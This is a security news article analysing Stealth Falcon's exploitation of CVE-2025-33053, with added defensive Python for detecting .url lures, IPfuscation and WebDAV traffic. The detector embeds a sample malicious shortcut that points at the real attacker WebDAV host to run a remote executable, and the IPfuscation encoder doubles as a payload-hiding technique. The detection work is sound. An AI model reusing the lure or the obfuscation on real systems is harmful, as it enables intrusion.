Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild

A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon.

The flaw, which enables remote code execution (RCE) by manipulating the working directory of a legitimate Windows program, was patched by Microsoft in its June 2025 Patch Tuesday updates following responsible disclosure by Check Point Research (CPR). Below is a technical breakdown of the attack and its implications.

Discovery and Exploitation of CVE-2025-33053

In March 2025, CPR identified an attempted cyberattack targeting a Turkish defense company.


The attack leveraged a malicious .url file, likely delivered via spear-phishing emails, to exploit CVE-2025-33053.

This vulnerability allows attackers to manipulate the working directory of legitimate Windows tools, such as iediagcmd.exe, to execute malicious files hosted on an attacker-controlled WebDAV server.

The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, launched iediagcmd.exe with its working directory set to an attacker-controlled WebDAV share (\\summerartcamp[.]net@ssl@443\DavWWWRoot\OSYxaOjr) that hosted a malicious route.exe.

Because iediagcmd.exe starts route.exe via Process.Start() without an absolute path, the working directory is searched before the system32 directory, so the attacker's route.exe on the WebDAV share was executed instead of the legitimate copy.
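The lure described above can be spotted statically before it is ever double-clicked. The following Python script is an added example, not code from Check Point or from the article: it parses Internet Shortcut (.url) files and flags the combination the attack relies on, a URL field that points at a local executable rather than a web address, a WorkingDirectory field that is a UNC path using WebDAV mini-redirector syntax (host@ssl@443, DavWWWRoot), and a document-looking double extension. The two .url bodies are constructed for the example and modeled on the fields the article describes; they are not the file recovered by CPR.

```python
import configparser
import re
from typing import Dict, List

# Constructed sample .url bodies for this example; they are NOT the artefacts
# from the Check Point report. The first mirrors the structure the article
# describes: a local LOLBin as the URL target and a WebDAV UNC path as the
# working directory. Backslashes are doubled only because these are Python
# string literals.
MALICIOUS_URL = """[InternetShortcut]
URL=C:\\Program Files\\Internet Explorer\\iediagcmd.exe
WorkingDirectory=\\\\summerartcamp.net@ssl@443\\DavWWWRoot\\OSYxaOjr
ShowCommand=7
IconFile=C:\\Program Files\\Internet Explorer\\iediagcmd.exe
"""

BENIGN_URL = """[InternetShortcut]
URL=https://www.example.com/quarterly-report.pdf
"""

UNC_RE = re.compile(r"^\\\\[^\\]+")                                   # \\host\...
WEBDAV_RE = re.compile(r"@ssl@|@\d{2,5}(\\|$)|davwwwroot", re.IGNORECASE)  # mini-redirector syntax
LOCAL_EXE_RE = re.compile(r"^[a-z]:\\.*\.(exe|com|bat|cmd|scr|pif)$", re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.url$", re.IGNORECASE)


def parse_url_file(text: str) -> Dict[str, str]:
    """Parse an Internet Shortcut. The format is INI-like; option names are
    case-insensitive, so configparser's default lower-casing is harmless.
    Interpolation is disabled because '%' is legal inside a URL."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp["InternetShortcut"])


def analyse_url_file(filename: str, text: str) -> List[str]:
    """Return the reasons a shortcut looks like the CVE-2025-33053 lure;
    an empty list means nothing suspicious was seen."""
    fields = parse_url_file(text)
    if not fields:
        return ["no [InternetShortcut] section; not a .url file"]
    url = fields.get("url", "")
    workdir = fields.get("workingdirectory", "")
    findings = []
    if LOCAL_EXE_RE.match(url):
        findings.append(f"URL launches a local executable instead of a web address: {url}")
    if UNC_RE.match(workdir):
        findings.append(f"WorkingDirectory is a remote UNC path: {workdir}")
    if WEBDAV_RE.search(workdir):
        findings.append("WorkingDirectory uses WebDAV mini-redirector syntax (host@ssl@port / DavWWWRoot)")
    if DOUBLE_EXT_RE.search(filename):
        findings.append(f"document-looking double extension: {filename}")
    return findings


if __name__ == "__main__":
    for name, body in [("TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url", MALICIOUS_URL),
                       ("quarterly-report.url", BENIGN_URL)]:
        print(name, "->", analyse_url_file(name, body) or ["clean"])
```

Run it over a mail-gateway quarantine or users' Downloads folders. A legitimate web shortcut almost never sets WorkingDirectory at all, so any remote value there is worth a look on its own; the host@ssl@443 form additionally tells the Windows WebClient service to speak HTTPS on port 443, which is why the retrieval blends in with ordinary browsing.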

According to Check Point, this is the first time a WebDAV working directory has been used to hijack which executable a legitimate Windows program runs, and it underscores Stealth Falcon's inventive abuse of built-in system utilities.

Stealth Falcon, also known as FruityArmor, has been active since at least 2012, targeting government and defense sectors in the Middle East and Africa, including Turkey, Qatar, Egypt, and Yemen.

According to Check Point's report, the group is known for acquiring zero-day exploits and deploying sophisticated, custom-built payloads.

Their latest campaign introduces the Horus Agent, a custom implant built on the open-source Mythic C2 framework, named after the Egyptian falcon-headed god.

Infection Chain

Figure: Infection chain (Source: Check Point)
  1. A phishing email delivers a malicious .url file, often within a ZIP archive, disguised as a legitimate document.
  2. This file exploits CVE-2025-33053, manipulating iediagcmd.exe to run a harmful route.exe from a WebDAV server.
  3. The attack deploys Horus Loader, a C++-based loader protected by Code Virtualizer, which evades detection through anti-analysis techniques like manual mapping of kernel32.dll and ntdll.dll and scanning for 109 antivirus processes from 17 vendors.
  4. It distracts victims by decrypting and displaying a decoy PDF, such as TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.
  5. The loader decodes the next-stage payload from a list of IPv6 address strings (a technique known as IPfuscation) and injects it into msedge.exe using ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread.
  6. The Horus Agent, the final payload, employs custom OLLVM obfuscation with string encryption (shift cipher, -39) and control flow flattening, along with API hashing to resolve imports dynamically.
  7. It communicates with command-and-control servers via AES-encrypted HTTP requests, secured with HMAC-SHA256, using up to four domains and a killswitch date of December 31, 2099.
  8. Supported commands include system enumeration (survey) and stealthy shellcode injection (shinjectchunked).
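Step 5's IPfuscation is simple to reproduce, and reproducing it is the fastest way to recognise it in a sample. The following Python is an added example, not code from the Horus Loader or from the Check Point report. It shows both halves of the technique: rebuilding a byte blob from a list of IP literals (IPv6 as the article describes, plus IPv4 for the general case, since the same trick works with 4-byte groups), and a scanner that pulls candidate IPv6 literals out of a binary so an analyst can spot a suspiciously long run of them. The payload bytes and the fake binary are constructed for the example; the loader's own decoding API is not stated in the article, and socket.inet_pton is used here as the portable equivalent.

```python
import re
import socket
from typing import Iterable, List


def decode_ipfuscated(addresses: Iterable[str]) -> bytes:
    """Rebuild a byte blob from IP literals: 16 bytes per IPv6 literal (the
    form the article describes) or 4 bytes per IPv4 literal. Trailing zero
    bytes from the last address are padding; a real loader knows the payload
    length, this example leaves them in place."""
    out = bytearray()
    for addr in addresses:
        family = socket.AF_INET6 if ":" in addr else socket.AF_INET
        out += socket.inet_pton(family, addr)
    return bytes(out)


def encode_ipfuscated(blob: bytes) -> List[str]:
    """Inverse transform, used here only to build the sample: chunk into
    16-byte groups, zero-pad the last one, render each as an IPv6 literal."""
    padded = blob + b"\x00" * (-len(blob) % 16)
    return [socket.inet_ntop(socket.AF_INET6, padded[i:i + 16])
            for i in range(0, len(padded), 16)]


IPV6_CANDIDATE = re.compile(rb"[0-9a-fA-F:]{6,39}")


def find_ipv6_literals(data: bytes) -> List[str]:
    """Scan a binary for runs of text that parse as IPv6 addresses. A sample
    whose data section holds dozens of consecutive literals is a strong hint
    of IPfuscation; ordinary binaries rarely embed more than a handful."""
    found = []
    for m in IPV6_CANDIDATE.finditer(data):
        s = m.group().decode("ascii")
        if s.count(":") < 2:          # need at least two groups to be an address
            continue
        try:
            socket.inet_pton(socket.AF_INET6, s)
        except OSError:               # hex-and-colon run that is not an address
            continue
        found.append(s)
    return found


# Constructed stand-in payload (not shellcode) wrapped in a fake binary, so
# the example runs offline. A real sample would carry hundreds of literals.
SAMPLE_PAYLOAD = b"\x55\x48\x89\xe5" + b"constructed stand-in, not real shellcode"
SAMPLE_LITERALS = encode_ipfuscated(SAMPLE_PAYLOAD)
FAKE_BINARY = b"MZ\x90\x00" + b"\x00".join(a.encode() for a in SAMPLE_LITERALS) + b"\x00\xff"

if __name__ == "__main__":
    print("literals embedded:", SAMPLE_LITERALS)
    recovered = find_ipv6_literals(FAKE_BINARY)
    print("recovered from binary:", recovered == SAMPLE_LITERALS)
    print("decoded:", decode_ipfuscated(recovered)[:len(SAMPLE_PAYLOAD)])
```

In triage, run find_ipv6_literals over a suspect PE's sections and decode whatever it returns; if the result starts with recognisable code or a PE header, you have the next stage without running the loader.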

The broader campaign is multi-stage and also involves Spayload, a C++ implant for Mythic with advanced capabilities.

Stealth Falcon’s toolkit includes several undocumented tools for post-compromise operations.

The DC Credential Dumper targets NTDS.dit, SAM, and SYSTEM files by accessing a virtual disk at C:\ProgramData\ds_notifier_0.vhdx using the DiscUtils library, compressing the files into a ZIP archive named ds_notifier_2.vif for exfiltration.

The Passive Backdoor, usrprofscc.exe, is a C-based tool that operates as a service (UsrProfSCC) with admin privileges, listening for AES-encrypted shellcode payloads.

The Custom Keylogger, StatusReport.dll, injects into dxdiag.exe, logging keystrokes to an RC4-encrypted file at C:\Windows\Temp\~TN%LogName%.tmp.

Mitigation and Recommendations

Microsoft’s patch for CVE-2025-33053 is now available, and organizations are urged to apply it immediately. CPR recommends:

  • Patching Systems: Update Windows to mitigate the WebDAV vulnerability.
  • Phishing Awareness: Train staff to recognize spear-phishing emails with suspicious attachments or links.
  • Network Monitoring: Watch for WebDAV-related traffic to domains like summerartcamp[.]net or mystartupblog[.]com.
  • Endpoint Security: Deploy solutions to detect LOLBin abuse and unauthorized process injections.
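The network-monitoring recommendation can be made concrete at the web proxy or egress log, where the Windows WebClient service is easy to fingerprint. The following Python is an added example, not code from Check Point or from the article: it triages proxy log lines and raises an alert for the indicators the article names (the two domains) and for the generic WebDAV pattern behind the attack, that is, the Microsoft-WebDAV-MiniRedir User-Agent or WebDAV verbs such as PROPFIND going to a host outside the organisation, with an executable fetched over that channel scored highest. The log lines, the tab-separated format, and the internal-namespace suffix are constructed assumptions for the example.

```python
from typing import Dict, List, Tuple

# Indicators the article lists, plus protocol fingerprints visible in any
# proxy or egress log regardless of the attacker's infrastructure.
IOC_DOMAINS = {"summerartcamp.net", "mystartupblog.com"}
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "MOVE", "COPY"}
WEBDAV_UA_PREFIX = "Microsoft-WebDAV-MiniRedir"   # User-Agent of the Windows WebClient service
EXEC_EXT = (".exe", ".dll", ".scr", ".cpl", ".com", ".bat", ".cmd")
INTERNAL_SUFFIXES = (".corp.example",)            # assumption: the organisation's own namespace

# Constructed proxy log, tab-separated: time, client, method, host:port, path,
# user-agent, status. The first three lines model the fetch described above;
# line four is a legitimate internal WebDAV share, line five plain browsing.
SAMPLE_LOG = """2025-03-12T09:14:02Z\t10.20.5.17\tOPTIONS\tsummerartcamp.net:443\t/OSYxaOjr\tMicrosoft-WebDAV-MiniRedir/10.0.19045\t200
2025-03-12T09:14:02Z\t10.20.5.17\tPROPFIND\tsummerartcamp.net:443\t/OSYxaOjr/route.exe\tMicrosoft-WebDAV-MiniRedir/10.0.19045\t207
2025-03-12T09:14:03Z\t10.20.5.17\tGET\tsummerartcamp.net:443\t/OSYxaOjr/route.exe\tMicrosoft-WebDAV-MiniRedir/10.0.19045\t200
2025-03-12T09:15:10Z\t10.20.5.22\tPROPFIND\tfiles.corp.example:443\t/share\tMicrosoft-WebDAV-MiniRedir/10.0.19045\t207
2025-03-12T09:16:44Z\t10.20.5.31\tGET\twww.example.org:443\t/index.html\tMozilla/5.0\t200
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split one tab-separated record; the host is normalised to lower case
    with the port removed so it can be compared against the IOC set."""
    ts, src, method, hostport, path, ua, status = line.rstrip("\n").split("\t")
    return {"ts": ts, "src": src, "method": method.upper(),
            "host": hostport.rsplit(":", 1)[0].lower(),
            "path": path, "ua": ua, "status": status}


def is_internal(host: str) -> bool:
    return host.endswith(INTERNAL_SUFFIXES)


def classify(rec: Dict[str, str]) -> List[str]:
    """Return every reason a record is suspicious; an empty list is benign.
    Internal WebDAV shares are expected and generate nothing."""
    reasons = []
    if rec["host"] in IOC_DOMAINS:
        reasons.append("host matches published Stealth Falcon infrastructure")
    webdav_client = rec["ua"].startswith(WEBDAV_UA_PREFIX) or rec["method"] in WEBDAV_METHODS
    if webdav_client and not is_internal(rec["host"]):
        reasons.append("WebDAV mini-redirector traffic to an external host")
    if webdav_client and rec["method"] == "GET" and rec["path"].lower().endswith(EXEC_EXT):
        reasons.append("executable retrieved over WebDAV")
    return reasons


def triage(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Run classify() over a log and return (client, host, reasons) per hit."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        reasons = classify(rec)
        if reasons:
            alerts.append((rec["src"], rec["host"], reasons))
    return alerts


if __name__ == "__main__":
    for src, host, reasons in triage(SAMPLE_LOG):
        print(f"{src} -> {host}: " + "; ".join(reasons))
```

The GET of an executable with the MiniRedir User-Agent is the highest-fidelity signal and is exactly what the exploit produces on the wire. Where outbound WebDAV to the internet is not a business need, the same match can be turned into a proxy block rule rather than an alert.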

The exploitation of CVE-2025-33053 by Stealth Falcon highlights the group’s technical sophistication and focus on high-value targets in the Middle East.

By combining zero-day exploits, custom implants, and evasive techniques, the group poses a significant threat to regional security. Organizations should prioritize patching and proactive monitoring to counter this evolving threat.
